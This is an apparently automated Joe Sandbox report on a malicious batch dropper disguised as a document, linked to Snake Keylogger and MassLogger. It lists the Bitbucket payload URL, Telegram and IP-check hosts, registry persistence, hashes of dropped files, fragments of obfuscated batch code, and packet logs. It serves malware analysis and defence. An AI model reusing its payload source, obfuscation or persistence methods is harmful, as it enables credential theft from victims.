bitbucket.org | 185.166.143.48 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 132.226.8.169 | true | false | | high
bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/ntim1478/gpmaw/downloads/202_Cneehezxuzj | false | | high
http://checkip.dyndns.org/ | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
185.166.143.48 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
54.231.224.185 | s3-w.us-east-1.amazonaws.com | United States | 16509 | AMAZON-02US | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577663
Start date and time: 2024-12-18 16:29:24 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: F.O Pump Istek,Docx.bat
Detection: MAL
Classification: mal100.bank.troj.spyw.evad.winBAT@42/18@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 59
• Number of non-executed functions: 209
Cookbook Comments:
• Found application associated with file extension: .bat
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: F.O Pump Istek,Docx.bat

Time | Type | Description
10:30:28 | API Interceptor | 2x Sleep call for process: spoolsv.COM modified
10:30:47 | API Interceptor | 4x Sleep call for process: Cneehezx.PIF modified
10:30:49 | API Interceptor | 641470x Sleep call for process: xzeheenC.pif modified
16:30:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url
16:30:47 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Cneehezx C:\Users\Public\Cneehezx.url

Match | Associated Sample Name / URL | Detection | Threat Name | Context
132.226.8.169 | 0001.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | PK241200518-EMAIL RELEASE-pdf.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe | malicious | VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | CITAS_pif.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | conferma..exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | file.exe | malicious | Snake Keylogger | checkip.dyndns.org/
132.226.8.169 | TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
132.226.8.169 | HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | 41570002689_20220814_05352297_HesapOzeti.exe | malicious | MassLogger RAT | checkip.dyndns.org/
132.226.8.169 | malware.ps1 | malicious | MassLogger RAT | checkip.dyndns.org/
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF">), ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):104
                                                                                                      Entropy (8bit):5.029068180804542
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1d1sbxSFARuAc:HRYFVmTWDyzwExSqRPc
                                                                                                      MD5:EED10F07FE1DBF0FF3AE5CC472F14792
                                                                                                      SHA1:326360EC682E857C41E909F6264D921BC1003F63
                                                                                                      SHA-256:C6AE718065B7199467422A84478FDBCFCA843EE6F12B210E45B6BC2731B430BE
                                                                                                      SHA-512:6ED3F93D62E9378B0ED8119F8C9460DD93048275B0926F13D263229104D371C1471D826B8AE230F8842B3695E7FA720D5344DAB4B4218FDD3F9BFF3652AFE6AB
                                                                                                      Malicious:true
                                                                                                      Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Cneehezx.PIF"..IconIndex=930636..HotKey=93..
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):15789
                                                                                                      Entropy (8bit):4.658965888116939
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                      MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                      SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                      SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                      SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                      Malicious:false
                                                                                                      Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):583193
                                                                                                      Entropy (8bit):7.3073922634117
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:iF0qv+93X92OirXQ2mHlHCrVs1NY/Ac95S5XCswppBYdH:i+qG9IOiM2iU/50CtQ
                                                                                                      MD5:4F30E1377F4BDE432BFCDF9E0545EEC6
                                                                                                      SHA1:048E58EBD70C38E15AD1BEE80C3B50FB149EAC02
                                                                                                      SHA-256:7FFEBB424079AA78D67B79ABCE9CDF79F3E0590F2452823400FFE2BB45BAA23A
                                                                                                      SHA-512:07074EAA924050F6D34102D16DBECAA6B4E279FD452BA0732CABDD308CAF732C7757D0E2245ABE2A8DDFA81E3F261B05BA4F7C6FD27E47E2D84CC3904C0BE97E
                                                                                                      Malicious:true
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1019392
                                                                                                      Entropy (8bit):7.009304310152198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMud:0wnRQj0KyEB1zcwfPMU
                                                                                                      MD5:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                      SHA1:2D028A4EE44F9B3DD5387DA39490D45F897D7C8F
                                                                                                      SHA-256:BA9C4833DF28503EA4AC99BDE43CE579FE555DC3ABCE36429197C4EC727CE5C3
                                                                                                      SHA-512:8C5A859A3B3D065C63187DBADD621EB71FB8747BBE39B2BB62E00251B747117092BC7791A0A80D7F4034F0255A8B929C270BA603D6B44ED192F94CC4E1802F67
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8556
                                                                                                      Entropy (8bit):4.623706637784657
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:dSSQx41VVrTlS2owuuWTtkY16Wdhdsu0mYKDCIfYaYuX1fcDuy:Vrhgwuua5vdnQaCIVJF6uy
                                                                                                      MD5:60CD0BE570DECD49E4798554639A05AE
                                                                                                      SHA1:BD7BED69D9AB9A20B5263D74921C453F38477BCB
                                                                                                      SHA-256:CA6A6C849496453990BECEEF8C192D90908C0C615FA0A1D01BCD464BAD6966A5
                                                                                                      SHA-512:AB3DBDB4ED95A0CB4072B23DD241149F48ECFF8A69F16D81648E825D9D81A55954E5DD9BC46D3D7408421DF30C901B9AD1385D1E70793FA8D715C86C9E800C57
                                                                                                      Malicious:false
                                                                                                      Preview:@echo off..set "MJtc=Iet "..@%.r.......%e%...%c%...r....%h%.....%o%........% % .....%o%...%f%.o.%f%......%..s%.......%e%.%t%.. .....% %.rr.. .%"%...%w%......%o%...o..%t%r.....%c%....%=%... . .%s%...... %e%....%t%....% %........ %"% o...%..%wotc%"%.%n% r .%O%...%P%.. ..%t%.%=%...... o..%=%......%"%....r...%..%wotc%"aeeYdDdanR%nOPt%s://"..%wotc%"%..........%a%.%e%......%e%.r..%Y%..%d%.....r....%D%.. %d% ... .%a%.. ...%n%.. ..%R%........%%nOPt%s%...... .%:%.. %/%....%/%r......%"%.....r.%..%wotc%"%...... ...%U%.o..%g%.r.%
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (420), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):46543
                                                                                                      Entropy (8bit):4.705001079878445
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:Ud6T6yIssKMyD/LgZ0+9Z2noufIBUEADZQp2H8ZLq:UdQFIssKMyjL4X2T8UbZT
                                                                                                      MD5:637A66953F03B084808934ED7DF7192F
                                                                                                      SHA1:D3AE40DFF4894972A141A631900BD3BB8C441696
                                                                                                      SHA-256:41E1F89A5F96F94C2C021FBC08EA1A10EA30DAEA62492F46A7F763385F95EC20
                                                                                                      SHA-512:2A0FEDD85722A2701D57AA751D5ACAA36BBD31778E5D2B51A5A1B21A687B9261F4685FD12E894244EA80B194C76E722B13433AD9B649625D2BC2DB4365991EA3
                                                                                                      Malicious:false
                                                                                                      Preview:@echo off..set "EPD=sPDet "..@%...... or%e%.........%c%......%h%.........o%o%.or......% %.o.ro...%o%.%f%...r.....%f%....r....%..s%. %e%.....%t% % % rrr....%"%.....%E%....%J%.. ....%O%.%h% .......%=%........%s%.. ..%e%....%t%....% %...o...%"%.%..%EJOh%"%.%r% %H%..%C%........%N%....o ....%=%..........%=% .%"%..%..%EJOh%"%.....%K%.%z%..r%j%........%L%..%c%. o.......%f%. o..%x%.%X%.........r%V%.%J%.....%%rHCN%k%.... ...%"%........%..%EJOh%"%.o.....%a%or%g%..o.... ..%u% ..%P%.....o...%X%.. .......%c% .....%U%.%I%. .
                                                                                                      Process:C:\Users\Public\kn.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1019392
                                                                                                      Entropy (8bit):7.009304310152198
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:Mt8U4ln77mcFj7LF6iNQj0KyEB1zcwfPMud:0wnRQj0KyEB1zcwfPMU
                                                                                                      MD5:46FC1E1BCA07585CF21CC37149F2B424
                                                                                                      SHA1:2D028A4EE44F9B3DD5387DA39490D45F897D7C8F
                                                                                                      SHA-256:BA9C4833DF28503EA4AC99BDE43CE579FE555DC3ABCE36429197C4EC727CE5C3
                                                                                                      SHA-512:8C5A859A3B3D065C63187DBADD621EB71FB8747BBE39B2BB62E00251B747117092BC7791A0A80D7F4034F0255A8B929C270BA603D6B44ED192F94CC4E1802F67
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      Process:C:\Users\Public\Libraries\spoolsv.COM
                                                                                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):175800
                                                                                                      Entropy (8bit):6.631791793070417
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                      MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                      SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                      SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                      SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                      Malicious:true
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                                      Joe Sandbox View:
                                                                                                      • Filename: D.G Governor Istek,Docx.exe, Detection: malicious
                                                                                                      • Filename: qDKTsL1y44.exe, Detection: malicious
                                                                                                      • Filename: PRODUCT.bat, Detection: malicious
                                                                                                      • Filename: purchaseorder.bat, Detection: malicious
                                                                                                      • Filename: PO11550.exe, Detection: malicious
                                                                                                      • Filename: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, Detection: malicious
                                                                                                      • Filename: PCMNil7wkU.exe, Detection: malicious
                                                                                                      • Filename: tTIYCp2sf4.exe, Detection: malicious
                                                                                                      • Filename: Re_Porforma_Invoice_60_downpayment_-_PT_Era_F1909003_Project_Kupang.exe, Detection: malicious
                                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):289792
                                                                                                      Entropy (8bit):6.135598950357573
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
                                                                                                      MD5:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      SHA1:F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
                                                                                                      SHA-256:B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
                                                                                                      SHA-512:99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Windows\System32\extrac32.exe
                                                                                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):1651712
                                                                                                      Entropy (8bit):6.144018815244304
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
                                                                                                      MD5:F17616EC0522FC5633151F7CAA278CAA
                                                                                                      SHA1:79890525360928A674D6AEF11F4EDE31143EEC0D
                                                                                                      SHA-256:D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
                                                                                                      SHA-512:3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
                                                                                                      Malicious:false
                                                                                                      Antivirus:
                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                      Process:C:\Users\Public\kn.exe
                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2038786
                                                                                                      Entropy (8bit):3.850506448763226
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:nTawbo9F7U7JIPcBTA/2ntge1ZGsPJmLeOg3hKFSIC09uriZeRwViOp8KB9/8TEj:M
                                                                                                      MD5:6892220C5881083C867B7271AE3242AC
                                                                                                      SHA1:BD4A53C21F1F7A53ED69CD9EC96F606E880D7E50
                                                                                                      SHA-256:DAEF811906FB8D0BC905F712E9EDBC970D17ADC31A5FA5517889B2DCEE73EF22
                                                                                                      SHA-512:B98888601892104B01B1276D467A6DEBB33E26276BE949DDDE68614435D387E26C669F7A6EB549DE28D7C95135FD46B09BFD2FEF7AD543E4E34D31E117D0D722
                                                                                                      Malicious:false
                                                                                                      Process:C:\Users\Public\alpha.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):104
                                                                                                      Entropy (8bit):4.403504238247217
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
                                                                                                      MD5:E14D0D771A7FEB9D78EA3DCA9197BA2A
                                                                                                      SHA1:48E363AAD601D9073D803AA9D224BF9A7FC39119
                                                                                                      SHA-256:0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
                                                                                                      SHA-512:3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
                                                                                                      Malicious:false
                                                                                                      Preview:The system cannot find message text for message number 0x400023a1 in the message file for Application...
                                                                                                      File type:ISO-8859 text, with very long lines (965), with CRLF line terminators
                                                                                                      Entropy (8bit):5.14003889014595
                                                                                                      TrID:
                                                                                                        File name:F.O Pump Istek,Docx.bat
                                                                                                        File size:2'966'423 bytes
                                                                                                        MD5:0bdc3aeffe000c9c0c73a3faa2d001d8
                                                                                                        SHA1:1c8bc96bd0e00b21d734f936aeaea1e612442912
                                                                                                        SHA256:e11e4469c9c003f2b0074deada876e15f30afccae6178c5317e16cf5e6ee1ff6
                                                                                                        SHA512:6e577ecc9f09a106bfc32f81ece6e3277f3c02622d12205da0d8efbaf5602d86b6556ed2df576bad9de48c7908122d8ae35008c65ad868822b25b6543865fe83
                                                                                                        SSDEEP:24576:kH1yveXvtJNwYay5+kiD7Dm5c0B58llll8lUWtWJxM9bhHNfbTXr063u95fX7:kVyGftJ+YawbiS5BBUvzM9bhHNfnXm
                                                                                                        TLSH:82D582A32DED06C62B496B7B974FF5589A3BDC3C86C26DC812C725BD100A74B2CD0D5A
                                                                                                        File Content Preview:COMCOM..&@cls&@set "_....=viulzHg htI5f9UEDny7kBLWJSZAC1xTKNR6GmOeQr82qca4jX0@3wPYdsbopVFM"..%_....:~51,1%%_....:~57,1%%_....:~39,1%%_....:~9,1%%_....:~7,1%"_..=%_....:~37,1%%_....:~59,1%%_....:~10,1%%_....:~62,1%%_....:~33,1%%_....:~40,1%%_....:~55,1%%_.
                                                                                                        Icon Hash:9686878b929a9886
                                                                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                        Dec 18, 2024 16:30:33.494700909 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:33.494796038 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:33.495277882 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:33.495290041 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.912269115 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.912379980 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:34.915798903 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:34.915808916 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.916062117 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:34.918330908 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:34.963324070 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.402211905 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451657057 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451689005 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451766014 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.451798916 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.451847076 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.459852934 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.459948063 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.629554033 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.629581928 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.629802942 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.629832029 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.629909039 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.637185097 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.676831007 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.676879883 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.677035093 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.677035093 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.677054882 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.686758041 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.686836004 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.686855078 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.741120100 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.789235115 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.789253950 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.789324045 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.789344072 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820683002 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820707083 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820765972 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820841074 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.820862055 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.820895910 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847138882 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847250938 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847273111 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847286940 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847326040 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847330093 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847347975 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847379923 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.847421885 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.847470999 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873508930 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.873565912 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.873636961 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873657942 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.873698950 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873727083 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.873730898 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.917141914 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.992357016 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992372036 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992424011 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992465973 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.992484093 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:35.992531061 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:35.994692087 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010811090 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010828018 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010886908 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.010895014 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.010941982 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.031939983 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.032022953 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.032068968 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.032077074 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.032141924 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.050266981 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050282001 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050337076 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050358057 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.050365925 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.050390959 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.067245007 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.067265034 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.067341089 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.067349911 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.085577011 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.085669994 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.085678101 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.085762978 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.088179111 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.088231087 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.178302050 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.178323984 CET4434970654.231.224.185192.168.2.8
                                                                                                        Dec 18, 2024 16:30:36.178455114 CET49706443192.168.2.854.231.224.185
                                                                                                        Dec 18, 2024 16:30:36.178478003 CET4434970654.231.224.185192.168.2.8
